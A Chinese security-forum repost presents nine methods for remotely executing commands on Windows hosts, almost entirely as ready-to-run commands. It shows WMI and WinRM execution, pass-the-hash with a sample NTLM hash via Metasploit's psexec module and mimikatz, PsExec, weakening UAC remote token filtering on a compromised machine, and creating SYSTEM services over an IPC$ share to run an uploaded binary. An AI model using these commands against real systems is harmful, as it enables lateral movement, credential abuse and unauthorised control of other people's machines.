安全矩阵

 找回密码
 立即注册
搜索
查看: 2513|回复: 0

Windows远程命令执行cmd命令的9种方法

[复制链接]

221

主题

233

帖子

792

积分

高级会员

Rank: 4

积分
792
发表于 2021-7-18 10:54:09 | 显示全部楼层 |阅读模式
Windows远程命令执行cmd命令的9种方法pt007 Top security 昨天
一、远程执行命令方式及对应端口:
  1. IPC$+AT 445
  2. PSEXEC 445
  3. WMI 135
  4. Winrm 5985(HTTP)&5986(HTTPS)
复制代码
二、9种远程执行cmd命令的方法:1.WMI执行命令方式,无回显:

           

wmic /node:192.168.1.158 /user:pt007 /password:admin123  process call create "cmd.exe /c ipconfig>d:\result.txt"
2.使用Hash直接登录Windows(HASH传递)抓取windows hash值,得到administrator的hash: 598DDCE2660D3193AAD3B435B51404EE:2D20D252A479F485CDF5E171D93985BF

  1. msf调用payload:
  2. use exploit/windows/smb/psexec
  3. show options
  4. set RHOST 192.168.81.129
  5. set SMBPass 598DDCE2660D3193AAD3B435B51404EE:2D20D252A479F485CDF5E171D93985BF
  6. set SMBUser Administrator
  7. show options
  8. run
复制代码
3. mimikatz传递hash方式连接+at计划任务执行命令:
  1. mimikatz.exe privilege::debug "sekurlsa::pth /domain:. /user:administrator /ntlm:2D20D252A479F485CDF5E171D93985BF" //传递hash
  2. dir \\192.168.1.185\c$
复制代码
4.WMIcmd执行命令,有回显:

           

WMIcmd.exe -h 192.168.1.152 -d hostname -u pt007 -p admin123 -c "ipconfig"
程序下载地址: https://github.com/nccgroup/WMIcmd/releases


5.Cobalt strkie远程执行命令与hash传递攻击

6.psexec.exe远程执行命令
  1. psexec /accepteula //接受许可协议
  2. sc delete psexesvc
  3. psexec \\192.168.1.185 -u pt007 -p admin123 cmd.exe
复制代码
7.psexec.vbs远程执行命令​cscript psexec.vbs 192.168.1.158 pt007 admin123 "ipconfig"
​8.winrm远程执行命令
  1. //肉机上面快速启动winrm服务,并绑定到5985端口:
  2. winrm quickconfig -q
  3. winrm set winrm/config/Client @{TrustedHosts="*"}
  4. netstat -ano|find "5985"

  5. //客户端连接方式:
  6. winrs -r:http://192.168.1.152:5985 -u:pt007 -p:admin123 "whoami /all"
  7. winrs -r:http://192.168.1.152:5985 -u:pt007 -p:admin123 cmd

  8. //UAC问题,修改后,普通管理员登录后也是高权限:
  9. reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
  10. winrs -r:http://192.168.1.152:5985 -u:pt007 -p:admin123 "whoami /groups"
复制代码
9.远程命令执行sc//建立ipc连接(参见net use + at)后上传等待运行的bat或exe程序到目标系统上,创建服务(开启服务时会以system 权限在远程系统上执行程序):
  1. net use \\192.168.17.138\c[        DISCUZ_CODE_29        ]nbsp;"admin123" /user:pt007
  2. net use
  3. dir \\192.168.17.138\c$
  4. copy test.exe \\192.168.17.138\c$
  5. sc \\192.168.17.138 create test binpath= "c:\test.exe"
  6. sc \\192.168.17.138 start test
  7. sc \\192.168.17.138 del test
复制代码

作者:pt007    转载于:先知社区    原文链接:https://xz.aliyun.com/t/5957


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-29 10:51 , Processed in 0.013098 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表